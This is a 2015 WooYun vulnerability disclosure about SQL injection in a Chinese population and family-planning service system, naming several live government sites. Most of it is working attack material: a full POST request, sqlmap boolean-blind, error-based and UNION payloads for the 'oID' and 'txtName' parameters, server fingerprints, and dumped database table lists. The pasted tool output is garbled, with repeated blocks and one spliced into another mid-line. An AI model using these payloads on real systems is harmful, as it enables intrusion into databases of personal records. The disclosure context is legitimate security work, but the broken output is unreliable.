当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100916

漏洞标题:某人口和计划生育服务系统两处通用型sql注射

相关厂商:西安网是科技发展有限公司

漏洞作者: YY-2012

提交时间:2015-03-12 15:02

修复时间:2015-06-15 11:28

公开时间:2015-06-15 11:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向第三方安全合作伙伴开放
2015-05-11: 细节向核心白帽子及相关领域专家公开
2015-05-21: 细节向普通白帽子公开
2015-05-31: 细节向实习白帽子公开
2015-06-15: 细节向公众公开

简要描述:

rt

详细说明:

技术支持:西安网是科技发展有限公司
系统全称:人口和计划生育公共服务系统
一处get和一处post共两处
案例:

http://service.ltpop.gov.cn/Services.shtml
http://service.hsrk.gov.cn/Services.shtml
http://service.sqjs.gov.cn/Services.shtml
http://service.zzxpop.gov.cn/Services.shtml
http://service.ltjsj.gov.cn/Services.shtml
http://service.zyxpop.gov.cn/Services.shtml
http://service.akpop.gov.cn/Services.shtml


举例:

POST /Services/FirstChildDo/76ce8fc5a9545deb/0303/610924104203.shtml HTTP/1.1
Host: service.zyxpop.gov.cn
Proxy-Connection: keep-alive
Content-Length: 781
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://service.zyxpop.gov.cn
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: application/x-www-form-urlencoded
Referer: http://service.zyxpop.gov.cn/Services/FirstChildDo/76ce8fc5a9545deb/0303/610924104203.shtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=h1jq01fnvg4loiu5y05uat55
__VIEWSTATE=%2FwEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY%2BE%3D&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys=+%E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=


Parameter: txtName (POST)

http://service.zyxpop.gov.cn/userctrl/GetInnerData.aspx?r=0.9662380507215858&FuncNo=8888&oID=610924104000&oNa=4


Parameter: oID (GET)

漏洞证明:

aaaaaaaa11111111111.jpg


aaaaaaaaa22222222222.jpg


a3333333333333.jpg


sqlmap identified the following injection points with a total of 497 HTTP(s) requests:
---
Parameter: oID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: r=0.9662380507215858&FuncNo=8888&oID=610924104000' AND 4528=4528 AND 'yNDt'='yNDt&oNa=4
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: r=0.9662380507215858&FuncNo=8888&oID=610924104000' AND 1046=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1046=1046) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'nIyL'='nIyL&oNa=4
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: r=0.9662380507215858&FuncNo=8888&oID=610924104000' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(86)+CHAR(78)+CHAR(110)+CHAR(73)+CHAR(85)+CHAR(70)+CHAR(72)+CHAR(122)+CHAR(90)+CHAR(111)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113),NULL,NULL-- &oNa=4
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 1244 HTTP(s) requests:
---
Parameter: txtName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9878=9878 AND 'ouoC'='ouoC&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9777=CONVERT(INT,(SELECT CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) (SELECT (CASE WHEN (9777=9777) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113))) AND 'sBNs'='sBNs&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Type: UNION query
Title: Generic UNION query (43) - 2 columns
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=-9937' UNION ALL SELECT 43,CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) CHAR(75) CHAR(76) CHAR(102) CHAR(116) CHAR(108) CHAR(115) CHAR(85) CHAR(80) CHAR(115) CHAR(74) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113)-- &txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9878=9878 AND 'ouoC'='ouoC&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9777=CONVERT(INT,(SELECT CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) (SELECT (CASE WHEN (9777=9777) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113))) AND 'sBNs'='sBNs&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Type: UNION query
Title: Generic UNION query (43) - 2 columns
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=-9937' UNION ALL SELECT 43,CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) CHAR(75) CHAR(76) CHAR(102) CHAR(116) CHAR(108) CHAR(115) CHAR(85) CHAR(80) CHAR(115) CHAR(74) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113)-- &txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9878=9878 AND 'ouoC'='ouoC&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=%E6%AF%9B%E6%B3%BD%E4%B8%9C' AND 9777=CONVERT(INT,(SELECT CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) (SELECT (CASE WHEN (9777=9777) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113))) AND 'sBNs'='sBNs&txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
Type: UNION query
Title: Generic UNION query (43) - 2 columns
Payload: __VIEWSTATE=/wEPDwUKLTE0Mjg5NTI1MQ9kFgICAxBkZBYCAhEPDxYCHgdWaXNpYmxlZ2QWAgIBDw9kFgQeB29uY2xpY2sFHnJldHVybiBWYWxpZGF0ZU1hcnJ5cygnMDMwMycpOx4Lb25tb3VzZW92ZXIFGHRoaXMuc3R5bGUuY3Vyc29yPSdoYW5kJ2RktGcwBbfslBYCNvGV5fQ1cnTOY+E=&txtU=FirstChildDo&txtV=76ce8fc5a9545deb&txtW=0303&txtX=610924104203&SearchKeys= %E5%85%B3%E9%94%AE%E5%AD%97&txtName=-9937' UNION ALL SELECT 43,CHAR(113) CHAR(107) CHAR(120) CHAR(118) CHAR(113) CHAR(75) CHAR(76) CHAR(102) CHAR(116) CHAR(108) CHAR(115) CHAR(85) CHAR(80) CHAR(115) CHAR(74) CHAR(113) CHAR(106) CHAR(107) CHAR(98) CHAR(113)-- &txtIDCard=210905197807210546&txtOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateName=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMateIDCard=210905197807210546&txtMateOriginalArea=%E9%98%BF%E6%96%AF%E9%A1%BF&txtMarriageStatus=%E6%9C%AA%E5%A9%9A&txtCurrentAddress=%E9%98%BF%E6%96%AF%E9%A1%BF&txtCommTxtA=&pType=0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
0&cbx01=1&cbx01=1&cbx01=1&cbx01=1&cbx01=1&txtCommMemo=&txtContactTel=13800138000&txtContaceMail=&ButApply=&GoBack=
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: ZY_CIEP
[41 tables]
+---------------------------------------------------+
| AreaCN |
| AreaDetailCN |
| BAS_EDUKIND |
| BAS_LivingStatus |
| BAS_MarraigeType |
| BAS_NATION |
| BAS_RPRKIND |
| BAS_Relation |
| BAS_SEXKIND |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_Docs |
| MsgBoard |
| MsgBoardReply |
| PIS_PISTable0 |
| SYS_Function |
| SYS_Log |
| SYS_MsgDocs |
| SYS_MsgDocs |
| SYS_Params |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_UserRoles |
| SiteLink |
| Sys_QueueBiz |
| Sys_UnitBiz |
| USER_BaseInfo |
| USER_Department |
| dtproperties |
| v_CmsContents |
| v_CmsList |
| v_MsgBoardList |
| v_MsgBoardRe |
| v_PIS |
| v_QueueBizList |
| v_SysLogs |
| v_SysMsg |
| v_UnitBiz |
| v_UserList |
| v_UserRolesPower |
+---------------------------------------------------+
Database: AK_ZY_PISS
[40 tables]
+---------------------------------------------------+
| AreaCN |
| AreaDetailCN |
| AreaNewAKS |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_Docs |
| PIS_BaseInfo |
| PIS_FOLK |
| PIS_NewbornTmp |
| PIS_Persons |
| PIS_QYK |
| SMSDic |
| SMSDic |
| SMSRecv |
| SYS_Function |
| SYS_Log |
| SYS_MsgDocs |
| SYS_MsgDocs |
| SYS_Params |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_UserRoles |
| USER_BaseInfo |
| USER_Department |
| UserHD_Directory |
| UserHD_Files |
| dtproperties |
| v_CmsContents |
| v_CmsList |
| v_PIS_ForStats |
| v_PIS_ForStats |
| v_PisStatsByFunc |
| v_SysLogs |
| v_SysMsg |
| v_UserHD_Directory |
| v_UserHD_Files |
| v_UserList |
| v_UserRolesDire |
| v_UserRolesPower |
+---------------------------------------------------+
Database: ZY_OA
[59 tables]
+---------------------------------------------------+
| AreaCN |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_IncDocs |
| CMS_ShareUsers |
| SYS_Function |
| SYS_Log |
| SYS_MissionBill |
| SYS_MissionDocs |
| SYS_Msg |
| SYS_Params |
| SYS_PhotoClass |
| SYS_Photos |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_UserRoles |
| SiteLink |
| USER_AddressList |
| USER_Archives |
| USER_Asset |
| USER_Attend |
| USER_BaseInfo |
| USER_Department |
| USER_PR_List |
| USER_Schedule |
| USER_WorkLog |
| UserHD_Directory |
| UserHD_Files |
| WorkFlowLogs |
| WorkFlowNames |
| WorkFlowNodes |
| dtproperties |
| v_Arrangement |
| v_CMSAsset |
| v_CMSContentsDetail |
| v_CMSContentsDetail |
| v_CMSContentsImg |
| v_CMSContentsList |
| v_CMSCritics |
| v_CMSPhotos |
| v_DocsList |
| v_FilePath |
| v_MissionBill |
| v_PR_List |
| v_ScheduleState |
| v_SysLogs |
| v_SysMsg |
| v_SysPhotoClass |
| v_SysPhotos |
| v_UserArchives |
| v_UserAttend |
| v_UserHD_Directory |
| v_UserHD_Files |
| v_UserList |
| v_UserRolesPower |
| v_UserSchedules |
| v_UserWorkLogs |
| v_WorkFlows |
+---------------------------------------------------+
Database: ZY_IBPP
[53 tables]
+---------------------------------------------------+
| AreaCN |
| AreaDetailCN |
| BAS_EDUKIND |
| BAS_LivingStatus |
| BAS_MarraigeType |
| BAS_NATION |
| BAS_RPRKIND |
| BAS_Relation |
| BAS_SEXKIND |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_Docs |
| Config_Rpt_CreateRptFiles |
| Config_Rpt_Design |
| Config_Rpt_PivotTable_List |
| Config_Rpt_PivotTable_Queue |
| Config_Rpt_Queue |
| Config_Rpt_SetCreate |
| Config_Rpt_Template |
| MsgBoard |
| MsgBoardReply |
| PIS_PISTable0 |
| PIS_RptData |
| PIS_RptIndex |
| SYS_Clients |
| SYS_Function |
| SYS_Log |
| SYS_Msg |
| SYS_Params |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_UserRoles |
| Sys_UnitBiz |
| USER_BaseInfo |
| USER_Department |
| dtproperties |
| v_CmsContents |
| v_CmsList |
| v_MsgBoardList |
| v_MsgBoardRe |
| v_PIS_DynamicInfo |
| v_PIS_DynamicInfo |
| v_QueueBizList |
| v_ReportDataHasRows |
| v_ReportFull |
| v_ReportIndex |
| v_ReportQuery |
| v_SysLogs |
| v_SysMsg |
| v_UnitBiz |
| v_UserList |
| v_UserRolesPower |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages90 |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
Database: ZY_ThirdExam
[73 tables]
+---------------------------------------------------+
| AreaCN |
| CMS_Class |
| CMS_Contents |
| CMS_Critic |
| CMS_IncDocs |
| CMS_ShareUsers |
| EXAM_BaseInfo |
| EXAM_Details |
| SYS_AssetsOut |
| SYS_AssetsOut |
| SYS_Customer_PR |
| SYS_Customer_PR |
| SYS_Function |
| SYS_Log |
| SYS_MissionDocs |
| SYS_MissionDocs |
| SYS_MissionDocs |
| SYS_Msg |
| SYS_Params |
| SYS_PhotoClass |
| SYS_Photos |
| SYS_RolesFunction |
| SYS_RolesFunction |
| SYS_UserRoles |
| SiteLink |
| USER_AddressList |
| USER_Archives |
| USER_Attend |
| USER_AttendSet |
| USER_BaseInfo |
| USER_Department |
| USER_Schedule |
| USER_WorkLog |
| USER_WorkLogView |
| UserHD_Directory |
| UserHD_Files |
| WorkFlowLogs |
| WorkFlowNames |
| WorkFlowNodes |
| dtproperties |
| v_Arrangement |
| v_AssetsOut |
| v_CMSAsset |
| v_CMSContentsDetail |
| v_CMSContentsDetail |
| v_CMSContentsImg |
| v_CMSContentsList |
| v_CMSCritics |
| v_CMSPhotos |
| v_CustomerInfo |
| v_DocsList |
| v_ExamBaseInfo |
| v_ExamInfo |
| v_FilePath |
| v_MissionDo |
| v_Missions |
| v_PR_List |
| v_ScheduleState |
| v_SysLogs |
| v_SysMsg |
| v_SysPhotoClass |
| v_SysPhotos |
| v_UserArchives |
| v_UserAttend |
| v_UserHD_Directory |
| v_UserHD_Files |
| v_UserList |
| v_UserRolesPower |
| v_UserRolesPower |
| v_UserSchedules |
| v_UserWorkLogs |
| v_WorkFlows |
| v_WorkLogViewUser |
+---------------------------------------------------+
Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| SYS_MsgDocs |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
